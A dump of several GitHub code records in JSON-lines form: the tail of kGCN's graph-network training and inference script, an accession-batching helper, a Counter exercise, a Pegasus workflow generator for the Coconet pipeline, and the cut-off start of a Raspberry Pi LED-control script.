#data x # task\n multiclass = False\n ntask = pred_score.shape[1]\n if pred_score.shape[2] == 1: # regression or binary\n pred_score = pred_score[:, :, 0]\n logging.info(f\"2-class sigmoid\")\n elif pred_score.shape[2] == 2: # binary\n pred_score = pred_score[:, :, 1]\n logging.info(f\"2-class softmax\")\n elif pred_score.shape[2] > 2:\n multiclass = True\n logging.info(f\"multi-class softmax\")\n # true_label: #data x # task/#class\n if ntask == 1 and len(true_label.shape) == 2 and true_label.shape[1] == 2:\n true_label = true_label[:, 1]\n if len(true_label.shape) == 1:\n true_label = true_label[:, np.newaxis]\n\n logging.info(f\"label #data x # task/#class: {true_label.shape}\")\n if not multiclass:\n logging.info(f\"binary-class mode\")\n v = []\n for i in range(ntask):\n el = {}\n if config[\"task\"] == \"regression\":\n el[\"r2\"] = sklearn.metrics.r2_score(true_label[:, i], pred_score[:, i])\n el[\"mse\"] = sklearn.metrics.mean_squared_error(true_label[:, i], pred_score[:, i])\n elif config[\"task\"] == \"regression_gmfe\":\n el[\"gmfe\"] = np.exp(np.mean(np.log(true_label[:, i]/pred_score[:, i])))\n else:\n pred = np.zeros(pred_score.shape)\n pred[pred_score > 0.5] = 1\n fpr, tpr, _ = roc_curve(true_label[:, i], pred_score[:, i], pos_label=1)\n roc_auc = auc(fpr, tpr)\n ap = average_precision_score(true_label[:, i], pred_score[:, i], pos_label=1)\n acc = accuracy_score(true_label[:, i], pred[:, i])\n scores = precision_recall_fscore_support(true_label[:, i], pred[:, i], average='binary')\n el[\"auc\"] = roc_auc\n el[\"acc\"] = acc\n el[\"ap\"] = ap\n el[\"pre\"] = scores[0]\n el[\"rec\"] = scores[1]\n el[\"f\"] = scores[2]\n el[\"sup\"] = scores[3]\n el[\"balanced_acc\"] = balanced_accuracy_score(true_label[:, i], pred[:, i])\n el[\"mcc\"] = matthews_corrcoef(true_label[:, i], pred[:, i])\n try:\n el[\"jaccard\"] = jaccard_score(true_label[:, i], pred[:, i])\n except:\n pass\n v.append(el)\n else: # multiclass=True\n # #data x # task x #class\n # limitation: #task=1\n logging.info(f\"multi-class mode\")\n pred = np.argmax(pred_score, axis=-1)\n true_label = np.argmax(true_label, axis=-1)\n pred = pred[:, 0]\n nclass = pred_score.shape[2]\n v = []\n for i in range(ntask):\n el = {}\n acc = accuracy_score(true_label, pred)\n scores = precision_recall_fscore_support(true_label, pred, labels=list(range(nclass)), average=None)\n el[\"acc\"] = acc\n el[\"pre\"] = scores[0]\n el[\"rec\"] = scores[1]\n el[\"f\"] = scores[2]\n el[\"sup\"] = scores[3]\n el[\"balanced_acc\"] = balanced_accuracy_score(true_label, pred)\n el[\"mcc\"] = matthews_corrcoef(true_label, pred)\n try:\n el[\"jaccard\"] = jaccard_score(true_label, pred)\n except:\n pass\n v.append(el)\n return v\n\n\ndef train(sess, graph, config):\n if config[\"validation_dataset\"] is None:\n _, train_data, valid_data, info = load_and_split_data(config, filename=config[\"dataset\"],\n valid_data_rate=config[\"validation_data_rate\"])\n else:\n print(\"[INFO] training\")\n train_data, info = load_data(config, filename=config[\"dataset\"])\n print(\"[INFO] validation\")\n valid_data, valid_info = load_data(config, filename=config[\"validation_dataset\"])\n info[\"graph_node_num\"] = max(info[\"graph_node_num\"], valid_info[\"graph_node_num\"])\n info[\"graph_num\"] = info[\"graph_num\"] + valid_info[\"graph_num\"]\n\n model = CoreModel(sess, config, info)\n load_model_py(model, config[\"model.py\"])\n\n metric_name = (\"mse\" if config[\"task\"] == \"regression\" else\n \"gmfe\" if config[\"task\"] == \"regression_gmfe\" else\n \"accuracy\")\n\n if config[\"profile\"]:\n vars_to_train = tf.trainable_variables()\n print(vars_to_train)\n\n # Training\n start_t = time.time()\n model.fit(train_data, valid_data)\n train_time = time.time() - start_t\n print(f\"training time: {train_time}[sec]\")\n if valid_data.num > 0:\n # Validation\n start_t = time.time()\n valid_cost, valid_metrics, prediction_data = model.pred_and_eval(valid_data)\n infer_time = time.time() - start_t\n print(f\"final cost = {valid_cost}\\n\"\n f\"{metric_name} = {valid_metrics[metric_name]}\\n\"\n f\"validation time: {infer_time}[sec]\\n\")\n # Saving\n if config[\"save_info_valid\"] is not None:\n result = {}\n result[\"validation_cost\"] = valid_cost\n result[\"validation_accuracy\"] = valid_metrics\n result[\"train_time\"] = train_time\n result[\"infer_time\"] = infer_time\n if config[\"task\"]!=\"link_prediction\":\n result[\"valid_metrics\"] = compute_metrics(config, info, prediction_data, valid_data.labels)\n ##\n save_path = config[\"save_info_valid\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result, fp, indent=4, cls=NumPyArangeEncoder)\n ##\n if config[\"save_info_train\"] is not None:\n fold_data = dotdict({})\n fold_data.valid_acc = valid_metrics[metric_name]\n if config[\"task\"] == \"regression\":\n fold_data.training_mse = [el[\"training_mse\"] for el in model.training_metrics_list]\n fold_data.validation_mse = [el[\"validation_mse\"] for el in model.validation_metrics_list]\n elif config[\"task\"] == \"regression_gmfe\":\n fold_data.training_mse = [el[\"training_gmfe\"] for el in model.training_metrics_list]\n fold_data.validation_mse = [el[\"validation_gmfe\"] for el in model.validation_metrics_list]\n else:\n fold_data.training_acc = [el[\"training_accuracy\"] for el in model.training_metrics_list]\n fold_data.validation_acc = [el[\"validation_accuracy\"] for el in model.validation_metrics_list]\n fold_data.training_cost = model.training_cost_list\n fold_data.validation_cost = model.validation_cost_list\n fold_data.train_time = train_time\n fold_data.infer_time = infer_time\n save_path = config[\"save_info_train\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(fold_data, fp, indent=4, cls=NumPyArangeEncoder)\n ##\n\n\n if config[\"export_model\"]:\n try:\n print(f\"[SAVE] {config['export_model']}\")\n graph_def = graph_util.convert_variables_to_constants(sess, graph.as_graph_def(), ['output'])\n tf.train.write_graph(graph_def, '.', config[\"export_model\"], as_text=False)\n except:\n print('[ERROR] output has been not found')\n if config[\"save_result_valid\"] is not None:\n filename = config[\"save_result_valid\"]\n save_prediction(filename, prediction_data)\n if config[\"make_plot\"]:\n if config[\"task\"] == \"regression\" or config[\"task\"] == \"regression_gmfe\":\n # plot_cost(config, valid_data, model)\n plot_r2(config, valid_data.labels, np.array(prediction_data))\n elif config[\"task\"]==\"link_prediction\":\n plot_cost(config, valid_data, model)\n else:\n plot_cost(config, valid_data, model)\n plot_auc(config, valid_data.labels, np.array(prediction_data))\n\ndef train_cv(sess, graph, config):\n all_data, info = load_data(config, filename=config[\"dataset\"], prohibit_shuffle=True) # shuffle is done by KFold\n model = CoreModel(sess, config, info)\n load_model_py(model, config[\"model.py\"])\n # Training\n if config[\"stratified_kfold\"]:\n print(\"[INFO] use stratified K-fold\")\n kf = StratifiedKFold(n_splits=config[\"k-fold_num\"], shuffle=config[\"shuffle_data\"], random_state=123)\n else:\n kf = KFold(n_splits=config[\"k-fold_num\"], shuffle=config[\"shuffle_data\"], random_state=123)\n\n kf_count = 1\n fold_data_list = []\n output_data_list = []\n if all_data[\"labels\"] is not None:\n split_base = all_data[\"labels\"]\n else:\n split_base = all_data[\"label_list\"][0]\n if config[\"stratified_kfold\"]:\n split_base = np.argmax(split_base, axis=1)\n score_metrics = []\n if config[\"task\"] == \"regression\":\n metric_name = \"mse\"\n elif config[\"task\"] == \"regression_gmfe\":\n metric_name = \"gmfe\"\n else:\n metric_name = \"accuracy\"\n split_data_generator = kf.split(split_base, split_base) if config[\"stratified_kfold\"] else kf.split(split_base)\n for train_valid_list, test_list in split_data_generator:\n print(f\"starting fold: {kf_count}\")\n train_valid_data, test_data = split_data(all_data,\n indices_for_train_data=train_valid_list,\n indices_for_valid_data=test_list)\n\n train_data, valid_data = split_data(train_valid_data, valid_data_rate=config[\"validation_data_rate\"])\n # Training\n print(train_valid_list)\n print(test_list)\n start_t = time.time()\n model.fit(train_data, valid_data, k_fold_num=kf_count)\n train_time = time.time() - start_t\n print(f\"training time: {train_time}[sec]\")\n # Test\n print(\"== valid data ==\")\n start_t = time.time()\n valid_cost, valid_metrics, prediction_data = model.pred_and_eval(valid_data)\n infer_time = time.time() - start_t\n print(f\"final cost = {valid_cost}\\n\"\n f\"{metric_name} = {valid_metrics[metric_name]}\\n\"\n f\"infer time: {infer_time}[sec]\\n\")\n print(\"== test data ==\")\n start_t = time.time()\n test_cost, test_metrics, prediction_data = model.pred_and_eval(test_data)\n infer_time = time.time() - start_t\n print(f\"final cost = {test_cost}\\n\"\n f\"{metric_name} = {test_metrics[metric_name]}\\n\")\n score_metrics.append(test_metrics[metric_name])\n print(f\"infer time: {infer_time}[sec]\")\n\n if config[\"export_model\"]:\n try:\n name, ext = os.path.splitext(config[\"export_model\"])\n filename = name+\".\"+str(kf_count)+ext\n print(f\"[SAVE] {filename}\")\n graph_def = graph_util.convert_variables_to_constants(sess, graph.as_graph_def(), ['output'])\n tf.train.write_graph(graph_def, '.', filename, as_text=False)\n except:\n print('[ERROR] output has been not found')\n if \"save_edge_result_cv\" in config:\n output_data = model.output(test_data)\n output_data_list.append(output_data)\n # save fold data\n fold_data = dotdict({})\n fold_data.prediction_data = prediction_data\n if all_data[\"labels\"] is not None:\n fold_data.test_labels = test_data.labels\n else:\n fold_data.test_labels = test_data.label_list\n fold_data.test_data_idx = test_list\n if config[\"task\"] == \"regression\":\n fold_data.training_mse = [el[\"training_mse\"] for el in model.training_metrics_list]\n fold_data.validation_mse = [el[\"validation_mse\"] for el in model.validation_metrics_list]\n elif config[\"task\"] == \"regression_gmfe\":\n fold_data.training_mse = [el[\"training_gmfe\"] for el in model.training_metrics_list]\n fold_data.validation_mse = [el[\"validation_gmfe\"] for el in model.validation_metrics_list]\n else:\n fold_data.training_acc = [el[\"training_accuracy\"] for el in model.training_metrics_list]\n fold_data.validation_acc = [el[\"validation_accuracy\"] for el in model.validation_metrics_list]\n fold_data.test_acc = test_metrics[metric_name]\n fold_data.training_cost = model.training_cost_list\n fold_data.validation_cost = model.validation_cost_list\n fold_data.test_cost = test_cost\n fold_data.train_time = train_time\n fold_data.infer_time = infer_time\n fold_data_list.append(fold_data)\n kf_count += 1\n\n print(f\"cv {metric_name}(mean) = {np.mean(score_metrics)}\\n\"\n f\"cv {metric_name}(std.) = {np.std(score_metrics)}\\n\")\n if \"save_info_cv\" in config and config[\"save_info_cv\"] is not None:\n save_path = config[\"save_info_cv\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n _, ext = os.path.splitext(save_path)\n if ext == \".json\":\n with open(save_path, \"w\") as fp:\n json.dump(fold_data_list, fp, indent=4, cls=NumPyArangeEncoder)\n else:\n joblib.dump(fold_data_list, save_path, compress=True)\n #\n if \"save_edge_result_cv\" in config and config[\"save_edge_result_cv\"] is not None:\n result_cv = []\n for j, fold_data in enumerate(fold_data_list):\n pred_score = np.array(fold_data.prediction_data)\n true_label = np.array(fold_data.test_labels)\n test_idx = fold_data.test_data_idx\n score_list = []\n for pair in true_label[0]:\n i1, _, j1, i2, _, j2 = pair\n s1 = pred_score[0, i1, j1]\n s2 = pred_score[0, i2, j2]\n score_list.append([s1, s2])\n fold = {}\n fold[\"output\"] = output_data_list[j][0]\n fold[\"score\"] = np.array(score_list)\n fold[\"test_data_idx\"] = test_idx\n result_cv.append(fold)\n save_path = config[\"save_edge_result_cv\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n _, ext = os.path.splitext(save_path)\n if ext == \".json\":\n with open(save_path, \"w\") as fp:\n json.dump(result_cv, fp, indent=4, cls=NumPyArangeEncoder)\n else:\n joblib.dump(result_cv, save_path, compress=True)\n #\n if \"save_result_cv\" in config and config[\"save_result_cv\"] is not None:\n result_cv = []\n for j, fold_data in enumerate(fold_data_list):\n v = compute_metrics(config, info, fold_data.prediction_data, fold_data.test_labels)\n result_cv.append(v)\n save_path = config[\"save_result_cv\"]\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result_cv, fp, indent=4, cls=NumPyArangeEncoder)\n #\n for i, fold_data in enumerate(fold_data_list):\n prefix = \"fold\"+str(i)+\"_\"\n result_path = config[\"plot_path\"]\n os.makedirs(result_path, exist_ok=True)\n if config[\"make_plot\"]:\n if config[\"task\"] == \"regression\":\n make_cost_acc_plot(fold_data.training_cost, fold_data.validation_cost,\n fold_data.training_mse, fold_data.validation_mse, result_path,prefix=prefix)\n pred_score = np.array(fold_data.prediction_data)\n plot_r2(config, fold_data.test_labels, pred_score, prefix=prefix)\n elif config[\"task\"] == \"regression_gmfe\":\n make_cost_acc_plot(fold_data.training_cost, fold_data.validation_cost,\n fold_data.training_mse, fold_data.validation_mse, result_path,prefix=prefix)\n pred_score = np.array(fold_data.prediction_data)\n plot_r2(config, fold_data.test_labels, pred_score, prefix=prefix)\n elif config[\"task\"] == \"link_prediction\":\n make_cost_acc_plot(fold_data.training_cost, fold_data.validation_cost,\n fold_data.training_acc, fold_data.validation_acc, result_path,prefix=prefix)\n else:\n make_cost_acc_plot(fold_data.training_cost, fold_data.validation_cost,\n fold_data.training_acc, fold_data.validation_acc, result_path,prefix=prefix)\n pred_score = np.array(fold_data.prediction_data)\n plot_auc(config, fold_data.test_labels, pred_score, prefix=prefix)\n\n\ndef infer(sess, graph, config):\n dataset_filename = config[\"dataset\"]\n if \"dataset_test\" in config:\n dataset_filename = config[\"dataset_test\"]\n if \"test_label_list\" in config:\n config[\"label_list\"]=config[\"test_label_list\"]\n all_data, info = load_data(config, filename=dataset_filename, prohibit_shuffle=True, test_mode=True)\n\n model = CoreModel(sess, config, info)\n load_model_py(model, config[\"model.py\"], is_train=False)\n\n metric_name = (\"mse\" if config[\"task\"] == \"regression\" else\n \"gmfe\" if config[\"task\"] == \"regression_gmfe\" else\n \"accuracy\")\n\n # Initialize session\n restore_ckpt(sess, config[\"load_model\"])\n\n # Validation\n start_t = time.time()\n test_cost, test_metrics, prediction_data = model.pred_and_eval(all_data)\n infer_time = time.time() - start_t\n print(f\"final cost = {test_cost}\\n\"\n f\"{metric_name} = {test_metrics[metric_name]}\\n\"\n f\"infer time: {infer_time}[sec]\\n\")\n\n if config[\"save_info_test\"] is not None:\n result = {}\n result[\"test_cost\"] = test_cost\n result[\"test_accuracy\"] = test_metrics\n result[\"infer_time\"] = infer_time\n if config[\"task\"]!=\"link_prediction\":\n result[\"test_metrics\"] = compute_metrics(config, info, prediction_data, all_data.labels)\n save_path = config[\"save_info_test\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result, fp, indent=4, cls=NumPyArangeEncoder)\n\n if config[\"save_result_test\"] is not None:\n filename = config[\"save_result_test\"]\n save_prediction(filename, prediction_data)\n if config[\"make_plot\"]:\n if config[\"task\"] == \"regression\":\n pred_score = np.array(prediction_data)\n plot_r2(config, all_data.labels, pred_score)\n elif config[\"task\"] == \"regression_gmfe\":\n pred_score = np.array(prediction_data)\n plot_r2(config, all_data.labels, pred_score)\n elif config[\"task\"] == \"link_prediction\":\n pass\n else:\n plot_auc(config, all_data.labels, np.array(prediction_data))\n \n if \"save_edge_result_test\" in config and config[\"save_edge_result_test\"] is not None:\n #output_left_pred = model.left_pred(all_data)\n #print(output_left_pred.shape)\n ##\n output_data = model.output(all_data)\n pred_score = np.array(prediction_data)\n true_label = np.array(all_data.label_list)\n score_list = []\n print(true_label.shape)\n for pair in true_label[0]:\n if len(prediction_data[0].shape)==2:\n i1, _, j1, i2, _, j2 = pair\n s1 = pred_score[0, i1, j1]\n s2 = pred_score[0, i2, j2]\n elif len(prediction_data[0].shape)==3:\n i1, r1, j1, i2, r2, j2 = pair\n s1 = pred_score[0, r1, i1, j1]\n s2 = pred_score[0, r2, i2, j2]\n score_list.append([s1, s2])\n fold = {}\n fold[\"output\"] = output_data[0]\n fold[\"score\"] = np.array(score_list)\n save_path = config[\"save_edge_result_test\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n _, ext = os.path.splitext(save_path)\n if ext == \".json\":\n with open(save_path, \"w\") as fp:\n json.dump(fold, fp, indent=4, cls=NumPyArangeEncoder)\n else:\n joblib.dump(fold, save_path, compress=True)\n\n if config[\"prediction_data\"] is not None:\n obj = {}\n pred_score = np.array(prediction_data)\n obj[\"prediction_data\"] = pred_score\n # obj[\"labels\"] = all_data.labels\n save_path = config[\"prediction_data\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n joblib.dump(obj, config[\"prediction_data\"], compress=True)\n\n\ndef restore_ckpt(sess, ckpt):\n saver = tf.train.Saver()\n logging.info(f\"[LOAD]{ckpt}\")\n try:\n saver.restore(sess, ckpt)\n except:\n print(\"======LOAD ERROR======\")\n print_variables()\n print_ckpt(sess, ckpt)\n raise Exception\n return saver\n\n\ndef visualize(sess, config, args):\n from kgcn.visualization import cal_feature_IG, cal_feature_IG_for_kg\n # input a molecule at a time\n batch_size = 1\n dataset_filename = config[\"dataset\"]\n if \"dataset_test\" in config:\n dataset_filename = config[\"dataset_test\"]\n all_data, info = load_data(config, filename=dataset_filename, prohibit_shuffle=True)\n\n model = CoreModel(sess, config, info)\n load_model_py(model, config[\"model.py\"], is_train=False, feed_embedded_layer=True, batch_size=batch_size)\n placeholders = model.placeholders\n restore_ckpt(sess, config['load_model'])\n # calculate integrated gradients\n if config['visualize_type'] == 'graph':\n cal_feature_IG(sess, all_data, placeholders, info, config, model.prediction,\n args.ig_modal_target, args.ig_label_target,\n logger=logging, model=model.nn, args=args)\n else:\n cal_feature_IG_for_kg(sess, all_data, placeholders, info, config, model.prediction,\n logger=logging, model=model.nn, args=args)\n\n\ndef main():\n seed = 1234\n np.random.seed(seed)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('mode', type=str,\n help='train/infer/train_cv/visualize')\n parser.add_argument('--config', type=str, default=None, nargs='?',\n help='config json file')\n parser.add_argument('--save-config', default=None, nargs='?',\n help='save config json file')\n parser.add_argument('--retrain', type=str, default=None,\n help='retrain from checkpoint')\n parser.add_argument('--no-config', action='store_true',\n help='use default setting')\n parser.add_argument('--model', type=str, default=None,\n help='model')\n parser.add_argument('--dataset', type=str, default=None,\n help='dataset')\n parser.add_argument('--gpu', type=str, default=None,\n help='constraint gpus (default: all) (e.g. --gpu 0,2)')\n parser.add_argument('--cpu', action='store_true',\n help='cpu mode (calcuration only with cpu)')\n parser.add_argument('--bspmm', action='store_true',\n help='bspmm')\n parser.add_argument('--bconv', action='store_true',\n help='bconv')\n parser.add_argument('--batched', action='store_true',\n help='batched')\n parser.add_argument('--profile', action='store_true',\n help='')\n parser.add_argument('--skfold', action='store_true',\n help='stratified k-fold')\n parser.add_argument('--param', type=str, default=None,\n help='parameter')\n parser.add_argument('--ig_targets', type=str, default='all',\n choices=['all', 'profeat', 'features', 'adjs', 'dragon','embedded_layer'],\n help='[deplicated (use ig_modal_target)]set scaling targets for Integrated Gradients')\n parser.add_argument('--ig_modal_target', type=str, default='all',\n choices=['all', 'profeat', 'features', 'adjs', 'dragon','embedded_layer'],\n help='set scaling targets for Integrated Gradients')\n parser.add_argument('--ig_label_target', type=str, default='max',\n help='[visualization mode only] max/all/(label index)')\n parser.add_argument('--visualize_type', type=str, default='graph',\n choices=['graph', 'node', 'edge_loss', 'edge_score'],\n help=\"graph: visualize graph's property. node: create an integrated gradients map\"\n \" using target node. edge_loss: create an integrated gradients map\"\n \" using target edge and loss function. edge_score: create an integrated gradients map\"\n \" using target edge and score function.\")\n parser.add_argument('--visualize_target', type=int, default=None,\n help=\"set the target's number you want to visualize. from: [0, ~)\")\n parser.add_argument('--visualize_resample_num', type=int, default=None,\n help=\"resampling for visualization: [0, ~v)\")\n parser.add_argument('--visualize_method', type=str, default='ig',\n choices=['ig', 'grad', 'grad_prod', 'smooth_grad', 'smooth_ig'],\n help=\"visualization methods\")\n parser.add_argument('--graph_distance', type=int, default=1,\n help=(\"set the distance from target node. An output graph is created within \"\n \"the distance from target node. :[1, ~)\"))\n parser.add_argument('--verbose', action=\"store_true\",\n help=\"set log level\")\n parser.add_argument('--visualization_header', type=str, default=None,\n help=\"filename header of visualization\")\n\n args = parser.parse_args()\n if args.verbose:\n logging.set_verbosity(logging.DEBUG)\n else:\n logging.set_verbosity(logging.WARN)\n\n # config\n config = get_default_config()\n if args.config is None:\n pass\n else:\n print(f\"[LOAD] {args.config}\")\n with open(args.config, \"r\") as fp:\n config.update(json.load(fp))\n # option\n if args.model is not None:\n config[\"load_model\"] = args.model\n if args.dataset is not None:\n config[\"dataset\"] = args.dataset\n # param\n if args.param is not None:\n config[\"param\"] = args.param\n # option\n if args.retrain is not None:\n config[\"retrain\"] = args.retrain\n # gpu/cpu\n if args.cpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = \"\"\n elif args.gpu is not None:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n #\n if args.profile:\n config[\"profile\"] = True\n if args.skfold is not None:\n config[\"stratified_kfold\"] = args.skfold\n # bspmm\n # if args.disable_bspmm:\n # print(\"[INFO] disabled bspmm\")\n # else:\n kgcn.layers.load_bspmm(args)\n # print(\"[INFO] enabled bspmm\")\n # depricated options\n if args.ig_targets != \"all\":\n args.ig_modal_target = args.ig_targets\n # setup\n\n config[\"visualize_type\"] = args.visualize_type\n config[\"visualize_target\"] = args.visualize_target\n config[\"graph_distance\"] = args.graph_distance\n\n with tf.Graph().as_default() as graph:\n seed = 1234\n tf.set_random_seed(seed)\n with tf.Session(config=tf.ConfigProto(log_device_placement=False,\n gpu_options=tf.GPUOptions(allow_growth=True))) as sess:\n # mode\n config[\"mode\"] = args.mode\n if args.mode == \"train\":\n train(sess, graph, config)\n if args.mode == \"train_cv\":\n train_cv(sess, graph, config)\n elif args.mode == \"infer\" or args.mode == \"predict\":\n infer(sess, graph, config)\n elif args.mode == \"visualize\":\n visualize(sess, config, args)\n if args.save_config is not None:\n print(f\"[SAVE] {args.save_config}\")\n os.makedirs(os.path.dirname(args.save_config), exist_ok=True)\n with open(args.save_config, \"w\") as fp:\n json.dump(config, fp, indent=4, cls=NumPyArangeEncoder)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"clinfo/kGCN","sub_path":"gcn.py","file_name":"gcn.py","file_ext":"py","file_size_in_byte":34001,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"4232738427","text":"accessions = []\nfor line in open('catA-v3.accessions.txt'):\n accessions += [line.strip()]\n\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\nbatches = 500\n\nfor chunk in chunks(accessions,batches):\n print(','.join(chunk))\n print()\n","repo_name":"serratus-bio/serratus-batch-assembly","sub_path":"stats/run_selector_splitter.py","file_name":"run_selector_splitter.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34797933460","text":"from counter import Counter\n\nc1 = Counter()\nc2 = Counter()\nc3 = Counter(10)\n\nc1.increment()\nc1.increment()\nc2.increment()\nc3.decrement()\n# c1.resep()\n\nc1.count=10\nn = c1.count\n\nprint(c1)\nprint(c2)\nprint(c3)","repo_name":"Viktarios/lesson23","sub_path":"lesson27/task01.py","file_name":"task01.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11959685328","text":"#!/usr/bin/env python3\n\nimport os\nfrom pathlib import Path\nfrom argparse import ArgumentParser\n\nfrom Pegasus.api import *\n\nclass CoconetWorkflow():\n wf = None\n sc = None\n tc = None\n rc = None\n props = None\n\n dagfile = None\n wf_name = None\n wf_dir = None\n\n def __init__(self, dagfile=\"workflow.yml\"):\n self.dagfile = dagfile\n self.wf_name = \"coconet_workflow\"\n self.wf_dir = Path(__file__).parent.resolve()\n return\n\n\n def write(self):\n self.sc.write()\n self.props.write()\n self.rc.write()\n self.tc.write()\n self.wf.write()\n return\n\n\n def create_pegasus_properties(self):\n self.props = Properties()\n return\n\n\n def create_sites_catalog(self, exec_site_name=\"condorpool\"):\n self.sc = SiteCatalog()\n\n shared_scratch_dir = os.path.join(self.wf_dir, \"scratch\")\n local_storage_dir = os.path.join(self.wf_dir, \"output\")\n\n local = Site(\"local\")\\\n .add_directories(\n Directory(Directory.SHARED_SCRATCH, shared_scratch_dir)\n .add_file_servers(FileServer(\"file://\" + shared_scratch_dir, Operation.ALL)),\n \n Directory(Directory.LOCAL_STORAGE, local_storage_dir)\n .add_file_servers(FileServer(\"file://\" + local_storage_dir, Operation.ALL))\n )\n\n exec_site = Site(exec_site_name)\\\n .add_pegasus_profile(style=\"condor\")\\\n .add_condor_profile(universe=\"vanilla\")\\\n .add_profiles(Namespace.PEGASUS, key=\"data.configuration\", value=\"condorio\")\n\n self.sc.add_sites(local, exec_site)\n return\n\n\n # --- Transformation Catalog (Executables and Containers) ----------------------\n def create_transformation_catalog(self, exec_site_name=\"condorpool\"):\n self.tc = TransformationCatalog()\n \n motion_container = Container(\"motion_container\", Container.DOCKER, image=os.path.join(self.wf_dir, \"containers/motion_container.tar\"), image_site=\"condorpool\")\n detection_container = Container(\"detection_container\", Container.DOCKER, image=os.path.join(self.wf_dir, \"containers/detection_container.tar\"), image_site=\"condorpool\")\n\n motion_module = Transformation(\"motion_module\", site=exec_site_name, pfn=os.path.join(self.wf_dir, \"bin/motion_module_wrapper.sh\"), is_stageable=True, container=motion_container)\\\n .add_condor_profile(request_gpus=\"1\")\n \n detection_module = Transformation(\"detection_module\", site=exec_site_name, pfn=os.path.join(self.wf_dir, \"bin/detection_module_wrapper.sh\"), is_stageable=True, container=detection_container)\n tracking_fusion_module = Transformation(\"tracking_fusion_module\", site=exec_site_name, pfn=os.path.join(self.wf_dir, \"bin/tracking_fusion_module_wrapper.sh\"), is_stageable=False)\n\n self.tc.add_containers(motion_container, detection_container)\n self.tc.add_transformations(motion_module, detection_module, tracking_fusion_module)\n return\n\n\n # --- Replica Catalog ----------------------------------------------------------\n def create_replica_catalog(self):\n self.rc = ReplicaCatalog()\\\n .add_replica(\"local\", \"dataset.tar.gz\", os.path.join(self.wf_dir, \"input/dataset.tar.gz\"))\\\n .add_replica(\"local\", \"yolov3.cfg\", os.path.join(self.wf_dir, \"input/yolov3.cfg\"))\\\n .add_replica(\"local\", \"yolov3.weights\", os.path.join(self.wf_dir, \"input/yolov3.weights\"))\n return\n\n\n # --- Submit Workflow ----------------------------------------------------------\n def submit_workflow(self):\n return\n\n \n # --- Create Workflow ----------------------------------------------------------\n def create_workflow(self):\n self.wf = Workflow(self.wf_name, infer_dependencies=True)\n \n dataset = File(\"dataset.tar.gz\")\n motion_output = File(\"motion_output.tar.gz\")\n motion_module_job = Job(\"motion_module\")\\\n .add_inputs(dataset)\\\n .add_outputs(motion_output, stage_out=True, register_replica=False)\n\n yolov3_cfg = File(\"yolov3.cfg\")\n yolov3_weights = File(\"yolov3.weights\")\n detection_output = File(\"detection_output.tar.gz\")\n detection_module_job = Job(\"detection_module\")\\\n .add_inputs(dataset, yolov3_cfg, yolov3_weights)\\\n .add_outputs(detection_output, stage_out=True, register_replica=False)\n\n self.wf.add_jobs(motion_module_job, detection_module_job)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description=\"Pegasus Coconet Workflow\")\n\n parser.add_argument(\"-o\", \"--output\", metavar=\"STR\", type=str, default=\"workflow.yml\", help=\"Output file (default: workflow.yml)\")\n\n args = parser.parse_args()\n\n workflow = CoconetWorkflow(args.output)\n \n print(\"Creating execution sites...\")\n workflow.create_sites_catalog()\n\n print(\"Creating workflow properties...\")\n workflow.create_pegasus_properties()\n \n print(\"Creating transformation catalog...\")\n workflow.create_transformation_catalog()\n\n print(\"Creating replica catalog...\")\n workflow.create_replica_catalog()\n\n print(\"Creating coconet workflow dag...\")\n workflow.create_workflow()\n\n workflow.write()\n","repo_name":"papajim/pegasus-coconet","sub_path":"workflow-generator.py","file_name":"workflow-generator.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25179676970","text":"from Coordinates import Coordinates\r\nfrom PixelsToMm import PixelsToMm\r\nfrom Motor import Motor\r\nfrom Calculations import Calculations\r\nfrom SaveToSD import SaveToSD\r\nimport RPi.GPIO as GPIO\r\nimport cv2\r\nimport time\r\n\r\nbuttonPin = 10\r\n\r\npinRood = 40\r\npinBlauw = 36\r\npinGroen = 38\r\n\r\n\r\ndef changeColor(color):\r\n if color == 'blue':\r\n roodwaarde = (0 * 100) / 255\r\n groenwaarde = (0 * 100) / 255\r\n blauwwaarde = (255 * 100) / 255\r\n\r\n ROOD.ChangeDutyCycle(roodwaarde)\r\n GROEN.ChangeDutyCycle(groenwaarde)\r\n BLAUW.ChangeDutyCycle(blauwwaarde)\r\n\r\n elif color == 'green':\r\n roodwaarde = (0 * 100) / 255\r\n groenwaarde = (255 * 100) / 255\r\n blauwwaarde = (0 * 100) / 255\r\n\r\n ROOD.ChangeDutyCycle(roodwaarde)\r\n GROEN.ChangeDutyCycle(groenwaarde)\r\n BLAUW.ChangeDutyCycle(blauwwaarde)\r\n\r\n elif color == 'red':\r\n roodwaarde = (255 * 100) / 255\r\n groenwaarde = (0 * 100) / 255\r\n blauwwaarde = (0 * 100) / 255\r\n\r\n 